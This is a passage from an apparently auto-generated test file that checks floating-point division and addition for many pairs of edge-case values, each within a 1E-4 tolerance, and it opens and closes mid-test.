-2147483648.0 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-749" --assertf~= -1.00000000046566 ( -2147483648.0 / 2147483647.0 ) 1E-4 --test-- "float-auto-750" fat-i: -2147483648.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= -1.00000000046566 fat-k 1E-4 --test-- "float-auto-751" --assertf~= 2147483648.0 ( -2147483648.0 / -1.0 ) 1E-4 --test-- "float-auto-752" fat-i: -2147483648.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= 2147483648.0 fat-k 1E-4 --test-- "float-auto-753" --assertf~= -715827882.666667 ( -2147483648.0 / 3.0 ) 1E-4 --test-- "float-auto-754" fat-i: -2147483648.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= -715827882.666667 fat-k 1E-4 --test-- "float-auto-755" --assertf~= 306783378.285714 ( -2147483648.0 / -7.0 ) 1E-4 --test-- "float-auto-756" fat-i: -2147483648.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= 306783378.285714 fat-k 1E-4 --test-- "float-auto-757" --assertf~= -429496729.6 ( -2147483648.0 / 5.0 ) 1E-4 --test-- "float-auto-758" fat-i: -2147483648.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= -429496729.6 fat-k 1E-4 --test-- "float-auto-759" --assertf~= -17394.617707091 ( -2147483648.0 / 123456.789 ) 1E-4 --test-- "float-auto-760" fat-i: -2147483648.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= -17394.617707091 fat-k 1E-4 --test-- "float-auto-761" --assertf~= -1.75722081776592E-24 ( -2147483648.0 / 1.222090944E+33 ) 1E-4 --test-- "float-auto-762" fat-i: -2147483648.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= -1.75722081776592E-24 fat-k 1E-4 --test-- "float-auto-763" --assertf~= -2.1474857954858E+53 ( -2147483648.0 / 9.99999E-45 ) 1E-4 --test-- "float-auto-764" fat-i: -2147483648.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= -2.1474857954858E+53 fat-k 1E-4 --test-- "float-auto-765" --assertf~= -2.7889398025974E-10 ( -2147483648.0 / 7.7E+18 ) 1E-4 --test-- "float-auto-766" fat-i: -2147483648.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= -2.7889398025974E-10 fat-k 1E-4 --test-- "float-auto-767" --assertf~= -0.999999999534339 ( 2147483647.0 / -2147483648.0 ) 1E-4 --test-- "float-auto-768" fat-i: 2147483647.0 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -0.999999999534339 fat-k 1E-4 --test-- "float-auto-769" --assertf~= 1.0 ( 2147483647.0 / 2147483647.0 ) 1E-4 --test-- "float-auto-770" fat-i: 2147483647.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-771" --assertf~= -2147483647.0 ( 2147483647.0 / -1.0 ) 1E-4 --test-- "float-auto-772" fat-i: 2147483647.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= -2147483647.0 fat-k 1E-4 --test-- "float-auto-773" --assertf~= 715827882.333333 ( 2147483647.0 / 3.0 ) 1E-4 --test-- "float-auto-774" fat-i: 2147483647.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 715827882.333333 fat-k 1E-4 --test-- "float-auto-775" --assertf~= -306783378.142857 ( 2147483647.0 / -7.0 ) 1E-4 --test-- "float-auto-776" fat-i: 2147483647.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -306783378.142857 fat-k 1E-4 --test-- "float-auto-777" --assertf~= 429496729.4 ( 2147483647.0 / 5.0 ) 1E-4 --test-- "float-auto-778" fat-i: 2147483647.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 429496729.4 fat-k 1E-4 --test-- "float-auto-779" --assertf~= 17394.617698991 ( 2147483647.0 / 123456.789 ) 1E-4 --test-- "float-auto-780" fat-i: 2147483647.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 17394.617698991 fat-k 1E-4 --test-- "float-auto-781" --assertf~= 1.75722081694765E-24 ( 2147483647.0 / 1.222090944E+33 ) 1E-4 --test-- "float-auto-782" fat-i: 2147483647.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 1.75722081694765E-24 fat-k 1E-4 --test-- "float-auto-783" --assertf~= 2.14748579448579E+53 ( 2147483647.0 / 9.99999E-45 ) 1E-4 --test-- "float-auto-784" fat-i: 2147483647.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 2.14748579448579E+53 fat-k 1E-4 --test-- "float-auto-785" --assertf~= 2.7889398012987E-10 ( 2147483647.0 / 7.7E+18 ) 1E-4 --test-- "float-auto-786" fat-i: 2147483647.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 2.7889398012987E-10 fat-k 1E-4 --test-- "float-auto-787" --assertf~= 4.65661287307739E-10 ( -1.0 / -2147483648.0 ) 1E-4 --test-- "float-auto-788" fat-i: -1.0 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= 4.65661287307739E-10 fat-k 1E-4 --test-- "float-auto-789" --assertf~= -4.6566128752458E-10 ( -1.0 / 2147483647.0 ) 1E-4 --test-- "float-auto-790" fat-i: -1.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= -4.6566128752458E-10 fat-k 1E-4 --test-- "float-auto-791" --assertf~= 1.0 ( -1.0 / -1.0 ) 1E-4 --test-- "float-auto-792" fat-i: -1.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-793" --assertf~= -0.333333333333333 ( -1.0 / 3.0 ) 1E-4 --test-- "float-auto-794" fat-i: -1.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= -0.333333333333333 fat-k 1E-4 --test-- "float-auto-795" --assertf~= 0.142857142857143 ( -1.0 / -7.0 ) 1E-4 --test-- "float-auto-796" fat-i: -1.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= 0.142857142857143 fat-k 1E-4 --test-- "float-auto-797" --assertf~= -0.2 ( -1.0 / 5.0 ) 1E-4 --test-- "float-auto-798" fat-i: -1.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= -0.2 fat-k 1E-4 --test-- "float-auto-799" --assertf~= -8.10000007371E-6 ( -1.0 / 123456.789 ) 1E-4 --test-- "float-auto-800" fat-i: -1.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= -8.10000007371E-6 fat-k 1E-4 --test-- "float-auto-801" --assertf~= -8.18269708084835E-34 ( -1.0 / 1.222090944E+33 ) 1E-4 --test-- "float-auto-802" fat-i: -1.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= -8.18269708084835E-34 fat-k 1E-4 --test-- "float-auto-803" --assertf~= -1.000001000001E+44 ( -1.0 / 9.99999E-45 ) 1E-4 --test-- "float-auto-804" fat-i: -1.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= -1.000001000001E+44 fat-k 1E-4 --test-- "float-auto-805" --assertf~= -1.2987012987013E-19 ( -1.0 / 7.7E+18 ) 1E-4 --test-- "float-auto-806" fat-i: -1.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= -1.2987012987013E-19 fat-k 1E-4 --test-- "float-auto-807" --assertf~= -1.39698386192322E-9 ( 3.0 / -2147483648.0 ) 1E-4 --test-- "float-auto-808" fat-i: 3.0 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -1.39698386192322E-9 fat-k 1E-4 --test-- "float-auto-809" --assertf~= 1.39698386257374E-9 ( 3.0 / 2147483647.0 ) 1E-4 --test-- "float-auto-810" fat-i: 3.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 1.39698386257374E-9 fat-k 1E-4 --test-- "float-auto-811" --assertf~= -3.0 ( 3.0 / -1.0 ) 1E-4 --test-- "float-auto-812" fat-i: 3.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= -3.0 fat-k 1E-4 --test-- "float-auto-813" --assertf~= 1.0 ( 3.0 / 3.0 ) 1E-4 --test-- "float-auto-814" fat-i: 3.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-815" --assertf~= -0.428571428571429 ( 3.0 / -7.0 ) 1E-4 --test-- "float-auto-816" fat-i: 3.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -0.428571428571429 fat-k 1E-4 --test-- "float-auto-817" --assertf~= 0.6 ( 3.0 / 5.0 ) 1E-4 --test-- "float-auto-818" fat-i: 3.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 0.6 fat-k 1E-4 --test-- "float-auto-819" --assertf~= 2.430000022113E-5 ( 3.0 / 123456.789 ) 1E-4 --test-- "float-auto-820" fat-i: 3.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 2.430000022113E-5 fat-k 1E-4 --test-- "float-auto-821" --assertf~= 2.4548091242545E-33 ( 3.0 / 1.222090944E+33 ) 1E-4 --test-- "float-auto-822" fat-i: 3.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 2.4548091242545E-33 fat-k 1E-4 --test-- "float-auto-823" --assertf~= 3.000003000003E+44 ( 3.0 / 9.99999E-45 ) 1E-4 --test-- "float-auto-824" fat-i: 3.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 3.000003000003E+44 fat-k 1E-4 --test-- "float-auto-825" --assertf~= 3.8961038961039E-19 ( 3.0 / 7.7E+18 ) 1E-4 --test-- "float-auto-826" fat-i: 3.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 3.8961038961039E-19 fat-k 1E-4 --test-- "float-auto-827" --assertf~= 3.25962901115417E-9 ( -7.0 / -2147483648.0 ) 1E-4 --test-- "float-auto-828" fat-i: -7.0 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= 3.25962901115417E-9 fat-k 1E-4 --test-- "float-auto-829" --assertf~= -3.25962901267206E-9 ( -7.0 / 2147483647.0 ) 1E-4 --test-- "float-auto-830" fat-i: -7.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= -3.25962901267206E-9 fat-k 1E-4 --test-- "float-auto-831" --assertf~= 7.0 ( -7.0 / -1.0 ) 1E-4 --test-- "float-auto-832" fat-i: -7.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= 7.0 fat-k 1E-4 --test-- "float-auto-833" --assertf~= -2.33333333333333 ( -7.0 / 3.0 ) 1E-4 --test-- "float-auto-834" fat-i: -7.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= -2.33333333333333 fat-k 1E-4 --test-- "float-auto-835" --assertf~= 1.0 ( -7.0 / -7.0 ) 1E-4 --test-- "float-auto-836" fat-i: -7.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-837" --assertf~= -1.4 ( -7.0 / 5.0 ) 1E-4 --test-- "float-auto-838" fat-i: -7.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= -1.4 fat-k 1E-4 --test-- "float-auto-839" --assertf~= -5.670000051597E-5 ( -7.0 / 123456.789 ) 1E-4 --test-- "float-auto-840" fat-i: -7.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= -5.670000051597E-5 fat-k 1E-4 --test-- "float-auto-841" --assertf~= -5.72788795659384E-33 ( -7.0 / 1.222090944E+33 ) 1E-4 --test-- "float-auto-842" fat-i: -7.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= -5.72788795659384E-33 fat-k 1E-4 --test-- "float-auto-843" --assertf~= -7.000007000007E+44 ( -7.0 / 9.99999E-45 ) 1E-4 --test-- "float-auto-844" fat-i: -7.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= -7.000007000007E+44 fat-k 1E-4 --test-- "float-auto-845" --assertf~= -9.09090909090909E-19 ( -7.0 / 7.7E+18 ) 1E-4 --test-- "float-auto-846" fat-i: -7.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= -9.09090909090909E-19 fat-k 1E-4 --test-- "float-auto-847" --assertf~= -2.3283064365387E-9 ( 5.0 / -2147483648.0 ) 1E-4 --test-- "float-auto-848" fat-i: 5.0 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -2.3283064365387E-9 fat-k 1E-4 --test-- "float-auto-849" --assertf~= 2.3283064376229E-9 ( 5.0 / 2147483647.0 ) 1E-4 --test-- "float-auto-850" fat-i: 5.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 2.3283064376229E-9 fat-k 1E-4 --test-- "float-auto-851" --assertf~= -5.0 ( 5.0 / -1.0 ) 1E-4 --test-- "float-auto-852" fat-i: 5.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= -5.0 fat-k 1E-4 --test-- "float-auto-853" --assertf~= 1.66666666666667 ( 5.0 / 3.0 ) 1E-4 --test-- "float-auto-854" fat-i: 5.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 1.66666666666667 fat-k 1E-4 --test-- "float-auto-855" --assertf~= -0.714285714285714 ( 5.0 / -7.0 ) 1E-4 --test-- "float-auto-856" fat-i: 5.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -0.714285714285714 fat-k 1E-4 --test-- "float-auto-857" --assertf~= 1.0 ( 5.0 / 5.0 ) 1E-4 --test-- "float-auto-858" fat-i: 5.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-859" --assertf~= 4.050000036855E-5 ( 5.0 / 123456.789 ) 1E-4 --test-- "float-auto-860" fat-i: 5.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 4.050000036855E-5 fat-k 1E-4 --test-- "float-auto-861" --assertf~= 4.09134854042417E-33 ( 5.0 / 1.222090944E+33 ) 1E-4 --test-- "float-auto-862" fat-i: 5.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 4.09134854042417E-33 fat-k 1E-4 --test-- "float-auto-863" --assertf~= 5.000005000005E+44 ( 5.0 / 9.99999E-45 ) 1E-4 --test-- "float-auto-864" fat-i: 5.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 5.000005000005E+44 fat-k 1E-4 --test-- "float-auto-865" --assertf~= 6.49350649350649E-19 ( 5.0 / 7.7E+18 ) 1E-4 --test-- "float-auto-866" fat-i: 5.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 6.49350649350649E-19 fat-k 1E-4 --test-- "float-auto-867" --assertf~= -5.74890472926199E-5 ( 123456.789 / -2147483648.0 ) 1E-4 --test-- "float-auto-868" fat-i: 123456.789 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -5.74890472926199E-5 fat-k 1E-4 --test-- "float-auto-869" --assertf~= 5.74890473193904E-5 ( 123456.789 / 2147483647.0 ) 1E-4 --test-- "float-auto-870" fat-i: 123456.789 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 5.74890473193904E-5 fat-k 1E-4 --test-- "float-auto-871" --assertf~= -123456.789 ( 123456.789 / -1.0 ) 1E-4 --test-- "float-auto-872" fat-i: 123456.789 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= -123456.789 fat-k 1E-4 --test-- "float-auto-873" --assertf~= 41152.263 ( 123456.789 / 3.0 ) 1E-4 --test-- "float-auto-874" fat-i: 123456.789 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 41152.263 fat-k 1E-4 --test-- "float-auto-875" --assertf~= -17636.6841428571 ( 123456.789 / -7.0 ) 1E-4 --test-- "float-auto-876" fat-i: 123456.789 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -17636.6841428571 fat-k 1E-4 --test-- "float-auto-877" --assertf~= 24691.3578 ( 123456.789 / 5.0 ) 1E-4 --test-- "float-auto-878" fat-i: 123456.789 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 24691.3578 fat-k 1E-4 --test-- "float-auto-879" --assertf~= 1.0 ( 123456.789 / 123456.789 ) 1E-4 --test-- "float-auto-880" fat-i: 123456.789 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-881" --assertf~= 1.01020950696121E-28 ( 123456.789 / 1.222090944E+33 ) 1E-4 --test-- "float-auto-882" fat-i: 123456.789 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 1.01020950696121E-28 fat-k 1E-4 --test-- "float-auto-883" --assertf~= 1.23456912456912E+49 ( 123456.789 / 9.99999E-45 ) 1E-4 --test-- "float-auto-884" fat-i: 123456.789 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 1.23456912456912E+49 fat-k 1E-4 --test-- "float-auto-885" --assertf~= 1.60333492207792E-14 ( 123456.789 / 7.7E+18 ) 1E-4 --test-- "float-auto-886" fat-i: 123456.789 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 1.60333492207792E-14 fat-k 1E-4 --test-- "float-auto-887" --assertf~= -5.6908044219017E+23 ( 1.222090944E+33 / -2147483648.0 ) 1E-4 --test-- "float-auto-888" fat-i: 1.222090944E+33 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -5.6908044219017E+23 fat-k 1E-4 --test-- "float-auto-889" --assertf~= 5.69080442455169E+23 ( 1.222090944E+33 / 2147483647.0 ) 1E-4 --test-- "float-auto-890" fat-i: 1.222090944E+33 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 5.69080442455169E+23 fat-k 1E-4 --test-- "float-auto-891" --assertf~= -1.222090944E+33 ( 1.222090944E+33 / -1.0 ) 1E-4 --test-- "float-auto-892" fat-i: 1.222090944E+33 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-893" --assertf~= 4.07363648E+32 ( 1.222090944E+33 / 3.0 ) 1E-4 --test-- "float-auto-894" fat-i: 1.222090944E+33 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 4.07363648E+32 fat-k 1E-4 --test-- "float-auto-895" --assertf~= -1.74584420571429E+32 ( 1.222090944E+33 / -7.0 ) 1E-4 --test-- "float-auto-896" fat-i: 1.222090944E+33 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -1.74584420571429E+32 fat-k 1E-4 --test-- "float-auto-897" --assertf~= 2.444181888E+32 ( 1.222090944E+33 / 5.0 ) 1E-4 --test-- "float-auto-898" fat-i: 1.222090944E+33 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 2.444181888E+32 fat-k 1E-4 --test-- "float-auto-899" --assertf~= 9.89893673648032E+27 ( 1.222090944E+33 / 123456.789 ) 1E-4 --test-- "float-auto-900" fat-i: 1.222090944E+33 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 9.89893673648032E+27 fat-k 1E-4 --test-- "float-auto-901" --assertf~= 1.0 ( 1.222090944E+33 / 1.222090944E+33 ) 1E-4 --test-- "float-auto-902" fat-i: 1.222090944E+33 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-903" --assertf~= 1.22209216609217E+77 ( 1.222090944E+33 / 9.99999E-45 ) 1E-4 --test-- "float-auto-904" fat-i: 1.222090944E+33 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 1.22209216609217E+77 fat-k 1E-4 --test-- "float-auto-905" --assertf~= 158713109610390.0 ( 1.222090944E+33 / 7.7E+18 ) 1E-4 --test-- "float-auto-906" fat-i: 1.222090944E+33 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 158713109610390.0 fat-k 1E-4 --test-- "float-auto-907" --assertf~= -4.65660821646452E-54 ( 9.99999E-45 / -2147483648.0 ) 1E-4 --test-- "float-auto-908" fat-i: 9.99999E-45 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -4.65660821646452E-54 fat-k 1E-4 --test-- "float-auto-909" --assertf~= 4.65660821863292E-54 ( 9.99999E-45 / 2147483647.0 ) 1E-4 --test-- "float-auto-910" fat-i: 9.99999E-45 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 4.65660821863292E-54 fat-k 1E-4 --test-- "float-auto-911" --assertf~= -9.99999E-45 ( 9.99999E-45 / -1.0 ) 1E-4 --test-- "float-auto-912" fat-i: 9.99999E-45 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= -9.99999E-45 fat-k 1E-4 --test-- "float-auto-913" --assertf~= 3.33333E-45 ( 9.99999E-45 / 3.0 ) 1E-4 --test-- "float-auto-914" fat-i: 9.99999E-45 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 3.33333E-45 fat-k 1E-4 --test-- "float-auto-915" --assertf~= -1.42857E-45 ( 9.99999E-45 / -7.0 ) 1E-4 --test-- "float-auto-916" fat-i: 9.99999E-45 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -1.42857E-45 fat-k 1E-4 --test-- "float-auto-917" --assertf~= 1.999998E-45 ( 9.99999E-45 / 5.0 ) 1E-4 --test-- "float-auto-918" fat-i: 9.99999E-45 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 1.999998E-45 fat-k 1E-4 --test-- "float-auto-919" --assertf~= 8.09999197370993E-50 ( 9.99999E-45 / 123456.789 ) 1E-4 --test-- "float-auto-920" fat-i: 9.99999E-45 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 8.09999197370993E-50 fat-k 1E-4 --test-- "float-auto-921" --assertf~= 8.18268889815127E-78 ( 9.99999E-45 / 1.222090944E+33 ) 1E-4 --test-- "float-auto-922" fat-i: 9.99999E-45 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 8.18268889815127E-78 fat-k 1E-4 --test-- "float-auto-923" --assertf~= 1.0 ( 9.99999E-45 / 9.99999E-45 ) 1E-4 --test-- "float-auto-924" fat-i: 9.99999E-45 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-925" --assertf~= 1.2987E-63 ( 9.99999E-45 / 7.7E+18 ) 1E-4 --test-- "float-auto-926" fat-i: 9.99999E-45 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 1.2987E-63 fat-k 1E-4 --test-- "float-auto-927" --assertf~= -3585591912.26959 ( 7.7E+18 / -2147483648.0 ) 1E-4 --test-- "float-auto-928" fat-i: 7.7E+18 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= -3585591912.26959 fat-k 1E-4 --test-- "float-auto-929" --assertf~= 3585591913.93926 ( 7.7E+18 / 2147483647.0 ) 1E-4 --test-- "float-auto-930" fat-i: 7.7E+18 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 3585591913.93926 fat-k 1E-4 --test-- "float-auto-931" --assertf~= -7.7E+18 ( 7.7E+18 / -1.0 ) 1E-4 --test-- "float-auto-932" fat-i: 7.7E+18 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-933" --assertf~= 2.56666666666667E+18 ( 7.7E+18 / 3.0 ) 1E-4 --test-- "float-auto-934" fat-i: 7.7E+18 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 2.56666666666667E+18 fat-k 1E-4 --test-- "float-auto-935" --assertf~= -1.1E+18 ( 7.7E+18 / -7.0 ) 1E-4 --test-- "float-auto-936" fat-i: 7.7E+18 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= -1.1E+18 fat-k 1E-4 --test-- "float-auto-937" --assertf~= 1.54E+18 ( 7.7E+18 / 5.0 ) 1E-4 --test-- "float-auto-938" fat-i: 7.7E+18 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 1.54E+18 fat-k 1E-4 --test-- "float-auto-939" --assertf~= 62370000567567.0 ( 7.7E+18 / 123456.789 ) 1E-4 --test-- "float-auto-940" fat-i: 7.7E+18 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 62370000567567.0 fat-k 1E-4 --test-- "float-auto-941" --assertf~= 6.30067675225323E-15 ( 7.7E+18 / 1.222090944E+33 ) 1E-4 --test-- "float-auto-942" fat-i: 7.7E+18 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 6.30067675225323E-15 fat-k 1E-4 --test-- "float-auto-943" --assertf~= 7.7000077000077E+62 ( 7.7E+18 / 9.99999E-45 ) 1E-4 --test-- "float-auto-944" fat-i: 7.7E+18 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 7.7000077000077E+62 fat-k 1E-4 --test-- "float-auto-945" --assertf~= 1.0 ( 7.7E+18 / 7.7E+18 ) 1E-4 --test-- "float-auto-946" fat-i: 7.7E+18 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 1.0 fat-k 1E-4 float-auto-test-func: func [ /local fat-i [float!] fat-j [float!] fat-k [float!] ][ --test-- "float-auto-947" fat-i: 0.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-948" fat-i: 0.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-949" fat-i: 0.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-950" fat-i: 0.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-951" fat-i: 0.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 3.0 fat-k 1E-4 --test-- "float-auto-952" fat-i: 0.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -7.0 fat-k 1E-4 --test-- "float-auto-953" fat-i: 0.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 5.0 fat-k 1E-4 --test-- "float-auto-954" fat-i: 0.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 123456.789 fat-k 1E-4 --test-- "float-auto-955" fat-i: 0.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-956" fat-i: 0.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= 9.99999E-45 fat-k 1E-4 --test-- "float-auto-957" fat-i: 0.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.7E+18 fat-k 1E-4 --test-- "float-auto-958" fat-i: -2147483648.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-959" fat-i: -2147483648.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -4294967296.0 fat-k 1E-4 --test-- "float-auto-960" fat-i: -2147483648.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-961" fat-i: -2147483648.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= -2147483649.0 fat-k 1E-4 --test-- "float-auto-962" fat-i: -2147483648.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= -2147483645.0 fat-k 1E-4 --test-- "float-auto-963" fat-i: -2147483648.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -2147483655.0 fat-k 1E-4 --test-- "float-auto-964" fat-i: -2147483648.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= -2147483643.0 fat-k 1E-4 --test-- "float-auto-965" fat-i: -2147483648.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= -2147360191.211 fat-k 1E-4 --test-- "float-auto-966" fat-i: -2147483648.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-967" fat-i: -2147483648.0 fat-j: 9.99999E-45 fat-k: fat-i + fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-968" fat-i: -2147483648.0 fat-j: 7.7E+18 fat-k: fat-i + fat-j --assertf~= 7.69999999785252E+18 fat-k 1E-4 --test-- "float-auto-969" fat-i: 2147483647.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-970" fat-i: 2147483647.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-971" fat-i: 2147483647.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 4294967294.0 fat-k 1E-4 --test-- "float-auto-972" fat-i: 2147483647.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= 2147483646.0 fat-k 1E-4 --test-- "float-auto-973" fat-i: 2147483647.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 2147483650.0 fat-k 1E-4 --test-- "float-auto-974" fat-i: 2147483647.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= 2147483640.0 fat-k 1E-4 --test-- "float-auto-975" fat-i: 2147483647.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 2147483652.0 fat-k 1E-4 --test-- "float-auto-976" fat-i: 2147483647.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 2147607103.789 fat-k 1E-4 --test-- "float-auto-977" fat-i: 2147483647.0 fat-j: 1.222090944E+33 fat-k: fat-i + fat-j --assertf~= 1.222090944E+33 fat-k 1E-4 --test-- "float-auto-978" 